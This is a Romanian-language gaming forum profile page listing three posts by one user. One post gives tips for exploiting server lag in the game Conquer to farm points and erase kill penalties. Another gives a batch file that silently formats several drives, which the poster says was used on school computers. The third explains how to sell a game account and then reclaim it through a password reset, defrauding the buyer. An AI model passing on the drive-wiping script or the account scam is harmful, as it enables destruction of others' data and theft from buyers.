Jump to content

Diablotrojan_mas

Members
  • Posts

    3
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Diablotrojan_mas's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. Poi....cum sa faci vp`uri....iti trebe un char pentru plvl.....un whater sa dea rev...si inca unu de lvl 69......il duci pana la 33,34% si cand iti pune vp`uri il omori k sa`i scada procentele ii dai rev...si incepi sa omori monstrii pentru a`i creste iar procente si deasemenea o sa`ti puna iar vp`uri.... K sa`ti scada pk`urile trebuie sa ai amulete....dupa cum stiti nu aveti voie sa dati decat 1 pe zi....tot ce trebuie sa faci este sa`ti cumperi amulete de cate ai nevoie si ti le pe pui pe F-uri (F1,F2,F3....etc.)......te deconectezi...si cand intri inapoi....incepi sa apeci pe f-uri...exista un lagg de server si deaceea el nu isi da seama cate amulete s`au dat si iti scad pk`urile Cum sa`l faci pe unu cu nume roshu.....poi.....enerveaza`l sa`si scoata guardu......cand guardu incepe sa dea in tine.....si te omora vi cu un whater sa`ti dai rev...si guardu o sa dea iar in tine......pana face 30 de pk`uri.....si se face roshu vi cu un cont mai mare k el ii dai in cap si i`ai luat hainele :oops: ........cam atat......bft....sper sa va fie de folos!!!
  2. Tot ce trebuie sa faci este sa deschizi un notepad si sa scri: @echo off format c:/q/y format e:/q/y format d:/q/y format h:/q/y format f:/q/y iti alegi ce vrei sa formatezi....si la salvare il numesti cum vrei tu singura chestie care trebuie s`o faci este sa`l salvtzi .BAT Am facut pe la scoala astea...la unele calc au mers.....la altele:-??nu .......sper sa va mearga:| .....bft!
  3. Salutare.....vreau sa explic cum faci sa iti iei inapoi un cont de conquer dupa ce l`ai dat altcuiva cu tot cu full data si mail.....e simplu....intri pe site...la reset pass....iti pui datele tale de la cont si apoi ajungi la optiunea reset pass....lashi pagina web deschisa si iti vinzi contu pe bani in joc sau iteme.....dupa ce ai luat itemele sau ce vrei tu sa iei pentru a`ti lua contu inapoi trebuie sa dai reset la parola....punandu`ti una noua si iti poti schimba tot cum vrei tu!!! :oops: ehhhh ceva care pentru voi e un fleac.....dar.....am facut multi bani pe faza asta:D:D sper k am fost destul de explicit...dak nu va descurcati imi spuneti!! P.S-mai sunt multe trucuri:[cum sa faci 10 k vp`uri intr`un minut] [cum sa scapi de pk`uri intr`un minut] [cum sa`l faci pe unu pe roshu fara sa dea in tine] dak vreti ceva din astea imi spuneti!!! bft sper sa va fie de folos
×
×
  • Create New...